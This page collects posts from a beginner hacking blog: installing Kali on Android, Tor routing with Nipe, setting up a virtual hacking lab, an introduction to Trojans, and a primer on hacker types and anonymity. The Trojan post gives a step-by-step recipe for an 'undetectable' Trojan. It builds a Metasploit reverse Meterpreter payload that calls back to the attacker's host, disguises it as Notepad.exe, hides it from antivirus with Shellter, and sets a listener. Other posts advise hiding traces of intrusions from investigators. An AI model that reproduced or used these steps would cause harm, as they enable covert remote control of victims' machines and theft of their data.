Showing posts with label Beginner. Show all posts
Showing posts with label Beginner. Show all posts
Wanna carry your Linux everywhere you go? It'll be a good idea to learn how to install Kali for Android phones.

How to Install Kali Linux on Android


Kali can be called a penetration testing Linux distro used by cryptographers and digital forensics. If you have no prior knowledge on this OS, you might wanna refer to HOW TO INSTALL KALI LINUX ON A SYSTEM since I've already broken it all down as well as installation tutorial on computers.

Penetration testing entails making use of a variety of tools and techniques in testing the limits of security procedures and policies. These days more apps are made available on the Android OS for smartphones and tablets every day, so it becomes somewhat worthwhile to have Kali Linux on your smartphone.



Unlike the Computer installation, follow the below steps closely and you'll find the android installation pretty easy

INSTALLING KALI LINUX ON THE ANDROID PHONE

Prerequisites
  • Android version 2.0 or higher
  • Full battery life
  • Nothing less than 5Gb of memory space (both internal and external)
  • A strong internet connection
I believe you have the above specs so let's continue; Rooted Android phones are required for this to work, so lemme start there:

1. Rooting Your Android Phone

Left to me I'd say have your phone rooted by an expert because a little mistake on your part might screw up your phone. However, if you can do it, what you first need to do is back up your phone data.

When that is done, go activate EOM unlocking and USB debugging in the smartphone's developer settings.

When the above steps are completed, head over to the Google developers site and download Android SDK tools and install it in a default directory. Or you can install it anywhere you can remember.

Uncheck everything in the displayed tab, then click to install two packages.

Note that this step is only for those with unrooted Android.

Install By Accepting Licenses

Find your way to your Android phone's manufacturer site and install the device drivers. Make sure the bootloader is unlocked.

Note that certain devices will ask you for an unlock key. Restart your Android to fastboot mode (done by pressing volume up+power on most devices).

Open a command prompt on your personal computer.

If your device requires a code, copy and paste it on your manufacturer's website. After the website form is submitted, you'll receive an email from your device manufacturer that contains a file, key and other necessary instructions for rooting your smartphone.

Get Kingo Root

How to Install Kali Linux on Android
Go and download the KingoRoot app from google play store. If you don't find it, a little google search will fix you. Install the application and make certain your phone is connected to your personal computer. 

Enable the debugging stuff in your Android and root your device.


2. Set up Linux deploy for Kali

How to Install Kali Linux on Android


NOTE for this procedure: Your Android phone should be rooted or have near you a rooting guide for your phone brand.

Download and install Linux deploy application from Google play store. Click on the download icon and select Kali distributions in the distributions tab.

Choose your installation type and location as well. You may decide to stick with the default settings but I recommend configuring up the deployment app yourself.

3. Installation

After configuring all the necessary stuff: You can go ahead to build the Kali image by pressing the install button at the top of the screen. This should take less than 5 minutes depending on your internet speed.


Installation boots a Kali Linux bootstrap directly from the Kali repository. By now Kali Linux is successfully installed.

4. VNC viewer app(optional)

Go download the VNC viewer app from google play store.

Now the steps to configure your VNC:


  • set Address to localhost 

  • set name to kali


When you must have finished the above steps, press the connect button and you'll find your Kali running on your Android.

How to Install Kali Linux on Android | installationThe Kali installation is prebuilt with a VNC or SSH server thus dropping the need to download one. So this step is optional.







5. The CHROOT mode

How to Install Kali Linux on Android | Chroot mode
Now you're done with the installation, let the Linux deploy mount and load your Kali Linux chroot image automatically. 

This step also means the start-up of SSH and VNC  servers to enhance easier remote access. Press the START symbol and this process will begin.


Note the IP address of your device. You'll be using it to log in to your kali session.

log in to chroot mode

Either use the SSH or VNC client to get yourself into your kali. The default VNC setup will be as follows;

  • username: android

  • Password/key: change

Important stuff you need know on using Kali Linux on Android

Linux deploy normally allocates 4GB of image size for a naked installation of kali. It is recommended you reconfigure the settings of the image size at the Linux deploy in case you need to install more utilities that might require huge space.

You might wanna check out how to use your Android as a security camera

Gotta use Tor browser properly right? Yeah, being anonymous while surfing online is a great idea.

NIPE: How to Anonymize your system completely with Tor


Tor is arguably the most popular onion browser out there, being able to run on Apple MacOS, Microsoft Windows and GNU/Linux(without installing any software).

Confused on what Tor actually is? Lemme put it this way; 

Tor browser protects your anonymity by bouncing your communications around a range of distributed networks of relay runs by aides all around the globe: it prohibits and ensures that somebody watching your Internet connection does not learn what sites you visit, it prevents the websites you browse through from knowing your physical location, and also lets you visit blocked websites.

Now, what is Nipe?

Nipe simply put, is a script to make Tor Network your Default Gateway.

This little Perl Script gives you access to route all your traffic directly from your
computer to the Tor Network. 

After it is all done, you can successfully surf the Internet Anonymously
without any worries of being tracked or traced back.


Let's get to it!

Download and install:

    cd nipe
    cpan install Switch JSON LWP::UserAgent

Commands needed:

    COMMAND          FUNCTION
    install                Install dependencies
    start                   Start routing
    stop                   Stop routing
    restart                Restart the Nipe process
    status                 See status

Examples:

    perl nipe.pl install
    perl nipe.pl start
    perl nipe.pl stop
    perl nipe.pl restart
    perl nipe.pl status
Hello!

As a new guy in the hacking world, I bet you'd want to know how to create a virtual hacking lab. If you don't know what this is or you just don't care enough to create one, I suggest you read this post thoroughly because it is highly essential.


How to Create a Virtual Hacking Lab



The hacking lab creates a safe environment to practice your hacks. This way you won't have to worry about the risk of failure when trying a hack in the real world because any slip off can be devastating.


Hacking isn't like most professions. In most, you fail and dust yourself off. But in this, you fail and probably spend some time behind bars. This makes practising very important, and this is where the virtual hacking lab comes in.


Many newbies find it pretty difficult to set up a dedicated lab to practice hacks. This article does justice to this problem.

I'll be breaking the tutorial down in 6 steps to make it easier to comprehend;


  1. Download VMware Workstation or Player
  2. Download Kali VMware Images
  3. Unzip Images
  4. Open VMware Image
  5. Download & Install Targets
  6. Download Old Applications

Let's go!

Step 1: Download VMware Workstation or Player

You should practice hacking within a virtual environment. You set up a hacking system like Kali Linux, and some victims to exploit. Essentially, you'll likely want multiple OS and software to enable you try out a variety of hacks.

How to Create a Virtual Hacking Lab


Virtual machines and a virtual network offer the safest way to set up a hacking lab. 


There are numerous virtualization systems available, including Oracle's VirtualBox, KVM, Microsoft's Virtual PC and Hyper-V, Citrix, and VMware's Workstation, VMware Player and ESXi.


In a case of a lab environment, I recommend VMware's Workstation or Player. The workstation is a purchasable product that costs as high as $200 after the free 30-day trial, while the Player is free-to-use.


The difference between these two is that the Workstation can both create and play, while the Player is used to just play VMs.


Download VMware's Workstation or Player here.


Step 2; Download Kali VMware Images

After you must have installed the virtualization system, your next step is to download the VMware images of Linux(provided by offensive language). These images help you to run from Workstation or player instead of creating a virtual machine. 



These images have already been created by Offensive Security. This basically means that you can then use it in either Workstation or Player once you download the VM of Kali.


Step 3; Unzip Images

You need to unzip the downloaded files using one of the several free available zip utilities like WinZip, WinArchiver, etc. 


Download and install the one that suits your fancy and unzip the files. The screenshot below shows the unzipped Kali files using the free trial of WinZip.



Step 4; Open VMware Image

When you must have unzipped all the files, your next step is to open up the virtual machine. Be sure to know the location you unzipped the VM image.

Next is to open the Player or the VMware Workstation. Go to file and open like in the below image.

How to Create a Virtual Hacking Lab


This opens a window like in the below image.


This shows the VMware VM file that you're gonna load into VMware. Note that I'm using the "amd64" which is simply the 64-bit version. The 32-bit version will work though, but a lil bit slower.

Next, after you do so, VMware starts your VM and displays the below image.





Now, hit the little green button in your screen that says "Power on this virtual machine." It will now display a Kali screen.

How to Create a Virtual Hacking Lab

Use "root" as User and "toor" as Password to get started hacking!


Step 5; Download & Install Targets

Now, download and install your target system. You could use your own host Windows system since this is merely a practice, you might wanna use an older and easier to hack system. 


I recommend installing a Windows Vista, XP, Server 2003, or an older version of Linux. You can use these systems to practice hacking since they have known security vulnerabilities. Later, when you think you're climbing up the ladder, you can now install and use Windows 7 and 8 for your hacks.


If you don't have a copy of these older OS, you can easily purchase them on the internet. At last check, it was sold for as low as $9.66 on Amazon, but that can change anytime.


Alternatively, you can get these OS for free on torrent sites, but BEWARE!..you'll likely be downloading more than you bargained for.


These free downloads often come with rootkits that embed in your system when you open the file.


You can get older versions of Linux from the distribution.

f

Step 6; Download Old Applications

Now that you have your operating system, you're gonna be needing apps and software to run on these older versions. These older versions have plenty known security flaws that you can check your hacking skills.


You can use the website "Old Apps" to download many of these.

How to Create a Virtual Hacking Lab

Hit me up in the comment section if you got stuff to say or add on how to create a virtual hacking lab.


Subscribe to my mailing list

* indicates required


spyhood | Introduction to Trojan Horse


I am pretty sure you’ve come across the movie "Troy", where Brad Pitt played Achilles. Like in the movie, a Trojan Horse is much similar to the wooden horse which was used to trick the soldiers of Troy into sneaking enemy warriors in their city.




A Trojan tends to look like a safe bet but isn’t. A Trojan horse hides malware in what appears to be a normal activity. Once entered, they will be connected to the host system and begin to pull the plugs of your computer without your consent and knowledge.


The behaviour of Trojan is in default daemon. You won’t know it is present in your computer system. At least not unless you’re a pentesting pro -). There are numerous ways a Trojan horse can look like.


1)       It sometimes looks like a malicious instruction that is hidden inside a legitimate program and carries out actions that are unwarranted and are unwanted by the user.

2)      A legit software source is altered by attaching a Trojan to it. One can easily execute this file with the help of a stub, and the legit program read as a byte. Once done, the user will see the program functioning normally and will never suspect that a Trojan was also entered into their system without his consent.


Trojans, in general, are spread by some form of social engineering. A quick example is clicking on a fake advert online, or a scenario where a user is tricked into executing an email attachment camouflaged to look unsuspicious.


Trojans may in effect allow an attacker access into the user’s information like passwords, personal identity and banking information.

Some of the most common Trojans


spyhood | Introduction to Trojan Horse


Ø  Downloader Trojan: The main focus of this kind of Trojan is to download additional malware into the already infected computer.


Ø  Backdoor Trojan: This Trojan allows the attacker access to the computer by creating a “backdoor”.


Ø  Infostealer Trojan: This kind of Trojan is specifically made to steal data from the infected computer.


Ø  Remote access Trojan: A Trojan that gives the attacker full control over the computer system.


Ø  DDoS attack Trojan: Designed to carry out DDoS attacks which flood a network with traffic, thereby taking it down.


 How to keep strong and not get wrecked by a Horse


I’ve been telling you lots of stuff on Trojan Horse which might have aroused your interest or gotten you a bit worried. Get excited bruh because Trojans aren’t bulletproof. Let’s take a look at some protection techniques;

spyhood | Introduction to Trojan Horse



Ø  Always be on the lookout for new updates for your operating system’s software. It is advisable to do this as soon as such an update comes online from the software company. The reason behind this is because attackers tend to exploit security vulnerabilities in outdated software.


Ø  Run periodic scans with your software. Computer security should begin with an internet security suite. You should set it up in a way that the program runs scans automatically in regular intervals.


Ø  Stop visiting unsafe websites. This can be done with the help of internet security suites which alerts the user if the site he’s about to visit is unsafe.


Ø  Protect all your accounts with very strong, unique passwords.


Ø  Always keep your personal information safe with a firewall.


      You must be wondering "okay, how do I know that my computer is infected?"


     My answer to that is to always be on the lookout for the following;


  •        Does your PC keep talking to you? displaying annoying popups and messages telling you that your PC is infected and in need of protection? It can also come in a form of an advert.

  •        Applications don't start. If you've ever tried to run a program from the start menu and nothing happens, or sometimes a different program starts, then you should worry. This could be another problem though, but it is one of the many symptoms of an infected computer.

  •       The computer is running extremely slow. This could be as a result of many things, including a Trojan.
        
  •       You find it difficult to connect to an internet or it runs extremely slow even though the guy next to you is browsing with ease.

  •       What happened to my files? Even my antivirus! 

  •      I connect to the Internet, and different windows open or the browser provides pages I did not request

  •     If your computer starts speaking a funny language. If the default language of applications changes, the screen displays back-to-front… you really check your computer because you might just have an infected system.


Mobile Apps aren't spared from Trojan


Trojans don’t just wreck laptops and desktop machines. They can also cause havoc on a mobile device. The amount of risk taken is basically the same, except that before completing an installation on an Android app, you’ll get a giant list of all the stuff you’re giving the application access to.



The major difference between a computer and an Android phone is that it’s pretty easier to get updates and choose anti-virus protection on pc, while you have to rely solely on Google to do the work.


Computer protection is constantly being improved, while mobile protection still lives a huge gap.

You should, however, note that if a Trojan is being executed in a restrictive environment like in a case of a non-root user in a UNIX system, the Trojan will most likely not function properly(though it can still pose some great threat). But in a scenario where it is executed in a windows environment, the Trojan will be able to carry out all its functionality because the windows security is more vulnerable than the Unix.



How do Hackers create an undetectable Trojan Horse?


There'll be no point to this introduction if I don't show an example of how hackers develop Trojans. There isn't a specific rule or method. Each hacker does whatever works for him, and i'm gonna share what works here. Quite basic actually.

However, you should note that in no way is Spyhood responsible for the actions you perform with this piece of knowledge. Check the disclaimer page for more info on that.

First, let's look at the list of things you'll be needing in order to perform this task;








  • Windows
  • Kali Linux
  • A No IP account with a domain name
  • Shellter
  • A forwarded port on your router
Now let's dive in 👇to the steps

spyhood | Introduction to Trojan Horse



First step; create the DNS payload using Kali Linux


  • Open Metasploit on Kali Linux by typing msfconsole in a terminal.

  • Type use payload/windows/meterpreter/reverse_tcp_dns.

  • Type show options. You will be prompted to set your lhost and lport.

  • Type set lhost (hostname you created, without http://).

  • Type set lport (port you forwarded on your router set for the Linux machine).

  • Type generate -h to display all options for generating the payload.

  • Type generate -f (file title you chose for the payload) -p windows -t raw. Example; generate -f DNS -p windows -t raw

  • Exit the terminal and click on Files.

  • Transfer the created payload to Windows. (Be aware that your AV might detect it at its current state).


Second step; create the executable file on Windows


  • For 32-bit Windows - Navigate to C:\Windows\System32\iexpress.exe (Right click and select run as administrator). For 64-bit Windows - Navigate to C:\Windows\SysWOW64\iexpress.exe (select run as administrator)

  • Select Create new Self Extraction Directive File.

  • Click next on the Package Purpose page.

  • Name the package.  Ex: Notepad.exe

  • No Prompt, click next.

  • Do not display a license.

  • Click Add and select any file on your computer. Choose Notepad.exe in the C:\Windows\System32 folder.

  • Click the drop arrow and select the file name you choose on the last screen.

  • Choose Hidden and then click next.

  • No Message. Click Next

  • Click Browse to create a title for your malware file. Then choose a destination path. Check the Hide File Extracting Progress Animation from user.

  • Select No restart.

  • You can either choose to save the self-extraction or not.

  • Click Next on the create Package. Then Finish.

Third step; use both created files in shellter to create Trojan Horse



  • Open the Shellter folder. Right click on Shellter.exe and run as Administrator.

  • Type A for Auto.

  • Type N for No.

  • Type the location of the EXE file you created from the second step and hit enter. Let Shellter do its thing for a minute.

  • Type C for custom when asked to choose payload, 

  • Type the location of the payload you created in the first step and hit enter.

  • Type N for No reflective DLL loader.

  • Press enter to allow Shellter do its thing. You should have a working undetectable Trojan Horse If it says Injection Verified!

  • Press enter to exit Shellter.

The final step; set your listener


I'm gonna use Armitage for this tutorial.







  • Go back to Kali Linux.

  • Open the Terminal and type Msfupdate.

  • Type apt-get install armitage.

  • Type msfdb init.

  • Open Armitage.

  • Click Connect.

  • Click Yes.

  • When Armitage opens, type: use exploit/multi/handler

  • Type set lhost 0.0.0.0

  • Type set lport (the exact port you forwarded in your router)

  • Type set payload windows/meterpreter/reverse tcp dns

  • Type set exitonsession false

  • (Optional.) Type set autorunscript migrate -f

  • (Optional.) Type set prependmigrate True

  • Type exploit -j

Optional steps are used in order to migrate the entire process automatically so the session does not end before you get the chance to do it manually.



Your Trojan Horse is ready. Don't forget to check my disclaimer page to check out the part Spyhood plays in all this. Also, connect with me on Facebook if you will.





Subscribe to my mailing list

* indicates required

If you’re a beginner and you have interest in learning the basics of hacking, what hacking is all about, and how to go about surfing anonymously.



You’ve come to the right place.

basic hacking for beginners


I'm gonna break it down in the below contents


  1. About hacking
  2. How hacking started
  3. Types of hackers
  4. Hacker terms
  5. Choosing which to become
  6. How to stay anonymous
  7. Protecting yourself


Disclaimer: this post contains affiliate links.


 What is hacking?

In computer networking, ‘hacking’ refers to any technical attempt to influence the standard behaviour of any network connection and connected systems.  

A hacker is any person engaged in hacking practices. The term ‘hacking’ traditionally means any intelligent, constructive, technical work that was not essentially related to computer systems.


Today, however, hacking is often related to malicious programming attacks on the Internet and security networks.


How and where did hacking originate?


M.I.T. Engineers in the 1950s to 1960s first popularized the word and concept of hacking. Begining at the model train club, then in the mainframe computer rooms, the ‘hacks’ pulled off by these hackers were meant to be harmless tech experiments and cool educational activities.

In later years, outside of M.I.T., others began applying the term to less principled pursuits. Before the Internet boomed, for example, several hackers in the U.S. and beyond experimented with methods to alter telephones for making free long-distance calls over the phone network illegally.

As internet and Computers exploded in popularity and status, data systems became by far the most likely common target for hackers.

What are the types of hackers?

basic hacking for beginners


To efficiently describe hacking, you need to first understand the concept “hackers”. 

One can easily presume them to be highly intelligent and skilled in computers. In reality, breaking a security system needs more intelligence and proficiency than actually creating one.

Lots of people desire to be hackers these days. Most of them neither know where to start nor the type of hacker they wish to be. If you’re among those guys, I say howdy sir. It does us lot of good to have some extra stuff in our knowledge bank.

So now, let’s start with the basics of hacking for beginners, by grasping and understanding the different types of hackers. Although there are mainly 3 types of hackers, I have decided to add some extra juice.

Read em up!



Black Hat Hackers(BHH)

This category of hackers is widely known as "crackers". The hackers in this subcategory are always tempted to gain privileges of someone’s system without proper authorization or permission.

Usually, these people work individually for their own gain. In some scenarios though, some might decide to form a team, only so they can be deadlier, and their impact causes trouble to a greater extent.

Their activities often include D-DOS attacks on websites, Identity theft, Vandalism, Site Defacing, and so much more.

You’ll get to know more on these terms in the following tutorials.



White Hat Hackers(WHH)

In contradiction to Black hat hackers, this category of hackers are life-saving angels to many individuals and organisations. They are also referred to as "Ethical Hackers". In fact, Ethical Hacking is considered a career in today's world for many.

To be an approved WHH, you first need to be certified. Though most WHH doesn’t really care about certification. That is because they already know they’re great in what they do.

To be more specific about what White hat hackers do; they perform security tests on different systems with proper authorization which would, of course, be definitely illegal if, in any way, the hands of a Blackhat hacker gets involved.

Grey Hat Hackers(GHH)

As you can probably picture, these are those categories of hackers hacking for both good and bad.

According to some definitions of a grey hat hacker, when he or she finds out vulnerabilities, they wouldn’t tell the vendor ways to exploit it. Rather, he or she will demand to be paid some fees to fix the problem.

However, such practice tends to decline with time due to the willingness of organizations to prosecute.

Another interesting definition of grey hat maintains that GHH perhaps only violate the law in an attempt to improve security.

GHHs usually do both black hacking for their malicious intentions, as well as white hacking with good intentions. They help but have potential to harm. The majority of Hackers fall into this subcategory.


Which One Should I Become?



If you ask me, I’d definitely advise against BHH. But you don't have to listen to me. What you need to know though, it’s always better to know what you are getting into. Hackers sometimes get caught and prosecuted according to the law.

Your best bet is to keep on learning until you gain some good knowledge, and know how to remove all traces of your hack.

There are different potential traces (like logs of the system you hacked, your information that got captured by the hacked system etc) that may lead an expert to pinpoint the handcuffs on your hands.
The different methods to remove the traces of the hacks will b lectured in the following tutorials.


You might wanna check out how to hack a website

Other types of Hackers


“Wait a sec bruh! I thought you said there are only 3 types of hackers"

Recall I said I’m gonna add a little juice. Well, you now know that there are only 3 types of hackers. But what you might not know is the different subcategories for these types.

Let’s break it down!

Ø  Elite Hacker - A rank meant to describe only the most skilled/ reputed hackers.

Ø  Script Kiddie - Lower rank than the first. This designates someone that tends to use tools made by others to perform stuff.

Ø  Neophyte - A much lower rank that describes a newbie to the world of hacking, and only got very little knowledge on the matter

Ø  Green Hat Hackers - As the name implies, they love green. They hack only for money. That’s all. They bother not with the consequences of their actions.

Do we really need all these labels?

It has always been the norm to label stuff just because it sounds cool. But in some cases, it never truly applies and is very limiting.

A single person can have several goals, each contradicting each other because us Humans are diverse in character. A befitting example I got from someone on Reddit was; 
If someone works as a certified Ethical Hacker and does pentesting for a consulting firm, but then at night he/she writes banking Malware. What is he/she?

In this context, you'll see that such person won't really fit in any of those above-mentioned types of hackers.

To answer the question, NO!. Just be you.



Hacker terms

It's all fun and professional to converse with other hackers either online or in person with specific words only hackers understand.

Sadly most people tend to get lost while trying to spin their head around the so many hacking terms.

I got an email from someone who's willing to learn, so I decided to make a list of some of em here.

Hacking vs. Cracking

Hacking truly applies only to actions having good intentions, while malicious attacks on PC/Computer networks and servers are known as cracking.

Most people fail to make this distinction. I don’t think it’s anyone’s fault though, because outside of academia, it’s so regular and common to hear the word "hack" misused and applied to crack.



To skyrocket your dream as a hacker, here are books specially written for both beginners and mediocre hackers I've found to be very helpful.



OK! how am I gonna be anonymous while hacking?

how to stay anonymous while hacking


If you’re planning to be a hacker(not minding the type you choose), then you should be really worried about your anonymity. What should concern you the most gotta be "How to stay Anonymous?".
I’ve compiled a list of some methods to stay anonymous when either surfing the internet or performing some hacks.



Note these literally are basic anonymity techniques, and cannot guarantee 100% anonymity. The more advanced techniques will be brought to terms in upcoming tutorials.



A. VPN

basic hacking for beginners

VPN stands for the acronym, Virtual Private Network. From my point of view, below are some facts that justify its need:

You're gonna be needing some hacking tools

1) Counterfeit the ISP's packet detection measures

This maintains your anonymity by making sure your ISP does not prioritize, inspect and throttle the data going in and out of your system.

2) Keep your IP address anonymous

Prevents the locations your packets are traversing from identifying your connection information details and location.

3) Hides your online activities from third parties. Cool right?

As a VPN supplies a secure tunnel in making a connection to the outside world, it keeps the third parties away from finding your online activities.

4) Not forgetting prevention of location identification and Geotargeting.


No need to go into this. Yeah! The title says it all.

Now to help you kickoff, below are some FREE VPN's that are available.

However, you should note that free VPNs are only for newbies, as it does not guarantee full anonymity.

1.       Cyberghost (Good for Germany)

2.       USA IP 

3.       Free VPN 

4.       VPN Tool (good for US)

5.       SecurityKIS 

6.       Hotspot Shield

7.       ProXPN 

8.       Open VPN

9.       Tor VPN

10.   Its Hidden



B. Proxies


Proxies are some less secure alternative for VPN's. Proxies, however, do the same job as VPN's, as it hides your IP when surfing the internet.

Different types of proxies exist, ranging from a list of less anonymous to high anonymous proxies. One thing you gotta keep in mind is that proxies will not last forever.

The available proxy address tends to change from time to time (which is great for staying anonymous).

Below are some of the Proxy sites that you can use as a starting leveller.

1.       Proxify

2.       Hidemyass

3.       Hidefromyou

4.      Proxy6

5.       Httpsurf

6.      Safersurfing

7.       Unblocked

8.       Proxeasy

9.       Newipnow



C. Virtual Machines


I highly recommend using a virtual machine while doing your stuff. It is perhaps, the best way of testing your exploits without the pain of purchasing a new computer.

This is heaven for White hat hackers because you can use a Virtual machine to test the servers(Remote Administration Tools) without the fear of a breach of your actual working environments.

Below are some of the Popular VM's that you can use.

1.       VMLite

2.       VMWare

3.       Virtual Box



D. Be Easy With Your DOX Info


A common mistake beginners make is to use real-life nicknames, email address, country etc on their slaves. I don’t suggest you do that unless you feel that much confidence.

As you are reading this now bruh/sis, I am pretty sure you’re gonna take my word. Don’t be too overconfident just yet. Don't put any kind of information after you’re done.

There’s a site for Fake Name Generation - Fakenamegenerator which helps you generate some fake profiles. You can get random profiles with lots and lot of information from this site.


Protecting yourself

basic hacking for beginners




If you’re working in a Linux system, do not attempt to work as a root user, especially when trying with new stuff. Else you may compromise your entire system.


You might wanna check out how to install Kali Linux(The hacker's OS)


You can, however, switch to your root user when you know what you’re doing. But beware of the fact that, even if you choose to run the application as a non-root user, the trojan can still work and get the user files/keyloggers etc.

So in my personal opinion, never download untrusted contents especially from small sites, IRC, IM, torrents, warez etc.

Pheew! hope I’m not boring you -). Don’t live yet man.

Now, it is of great importance that you know some of the hacking techniques commonly used to get your personal information in an unauthorized way.

10. Keylogger

A keylogger is a simple tool that records the key sequence and strokes from your keyboard into your machine’s log file. These log files might in some cases contain your personal email IDs and passwords.

Keyloggers are perhaps the sole reason online banking websites tend to give you an option to use their virtual keyboards.

9. Denial of Service (DOS\DDOS)

A Denial of Service is mostly used on websites. The attack is a hacking technique to bring down a site or server by bombarding that site or server with very high traffic that the server is incapable to process all the requests in real time and finally crashes.

For DDOS attacks, most hackers make use of botnets or zombie computers which its only work is to overflow your system with request packets.

8. Waterhole attacks

Are you a big fan of National Geographic channels? If yes, then you should relate easily to the waterhole attacks. To attack a place, in this scenario, the hacker hits the most reachable physical point of the victim.

Example, if the source of a river is attacked and poisoned, it’ll really hit the entire stretch of animals during summer.

In the exact same way, hackers often aim at the most accessed physical location to attack the victim. This could be a restaurant, game shop etc.

Once a black hat hacker spies on you and is aware of your schedule, he might create a fake Wi-Fi access point and alter your most viewed website and redirect them to you to get your personal information.

7. Fake WAP

Maybe just for fun, not necessarily targeting you. A hacker might just create a fake wireless access point.

This WAP will connect to the official public place WAP. Immediately you connect to the fake WAP, a hacker can access your data. Somehow like in the above case.

6. Eavesdropping (Passive Attacks)

Unlike the above attacks which are pretty active. Using a passive attack, a hacker monitors your computer systems and networks to gain some unwanted information.

The motive behind eavesdropping, however, is not to harm the system, but to get some information without being identified.

5. Phishing

In this type, the hacker duplicates the most accessed sites and traps the victim by sending a spoofed link.

Once the victim tries to log in to his account and enters some data, boom! the hacker gets all the private information of the victim using the trojan running on the fake site.

4. Virus, Trojan etc

Virus or trojans are malicious software programs which are installed into the victim’s computer system and keeps sending the victim’s data to the hacker.

3. ClickJacking Attacks

ClickJacking is known as UI Redress to some. In this type of hack, the hacker hides the authentic UI the victim is supposed to click.

In other words, the hacker usurps the clicks that aren’t meant for that exact page, but for a different page where the hacker desires you to be.

Introduction to Trojan

2. Cookie theft

The cookies in a browser keep our personal data such as username, passwords and browsing history for different websites that we access.

Once the hacker gets access to your cookie, he can do plenty things as you. To the extent of authenticating himself as you on any browser.

1. Bait and switch

Using this type of hacking technique, the hacker runs a malicious program which the user think is authentic.

This way, when installation is complete, the hacker gets unprivileged access to your computer.



Let’s call it for today.

Keep in mind that this isn’t close to the end. More parts are coming real soon.

For now, practice what I’ve been preaching.





Subscribe to my mailing list

* indicates required